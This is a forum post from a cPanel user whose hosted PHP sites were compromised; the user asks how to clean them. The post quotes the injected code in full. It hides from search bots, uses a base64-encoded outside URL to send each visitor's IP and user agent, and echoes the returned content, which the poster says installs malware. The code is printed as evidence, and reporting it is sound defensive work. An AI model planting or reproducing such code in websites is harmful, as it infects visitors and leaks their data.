Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Problem with code inserted in base64_decode php scripts from accounts.

Discussion in 'General Discussion' started by michel.rw, Apr 4, 2012.

  1. michel.rw

    michel.rw Registered

    Joined:
    Jun 13, 2011
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    51
    Hi there, I have a serious problem.

    I have several domains hosted in my reseller, and a few days ago these areas were invaded and changed files "php" accounts.
    By checking these changes, I noticed that were inserted the following code in the files:

    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
    **** ****// This code use for global bot statistic
    **** ****$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // ****Looks for google serch bot
    **** ****$stCurlHandle = NULL;
    **** ****$stCurlLink = "";
    **** ****if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
    **** ****{
    **** **** **** ****if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create ****bot analitics
    **** **** **** ****$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
    **** **** **** **** **** ****$stCurlHandle = curl_init( $stCurlLink );
    **** ****}
    **** ****}
    if ( $stCurlHandle !== NULL )
    {
    **** ****curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    **** ****$sResult = @curl_exec($stCurlHandle);
    **** ****if ($sResult[0]=="O")
    **** **** {$sResult[0]=" ";
    **** **** ****echo $sResult; // Statistic code end
    **** **** ****}
    **** ****curl_close($stCurlHandle);
    }
    }
    ?>

    Analyzing this code we find that it is an encrypted link that redirects to a page from a server that installs malware on a PC.
    Urgently need to remove that code and I can not find a way to remove this code.

    I need help.
    I learned that with regular expressions would be easier to remove that code from the pages affected.
     
    #1 michel.rw, Apr 4, 2012
    Last edited: Apr 4, 2012
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice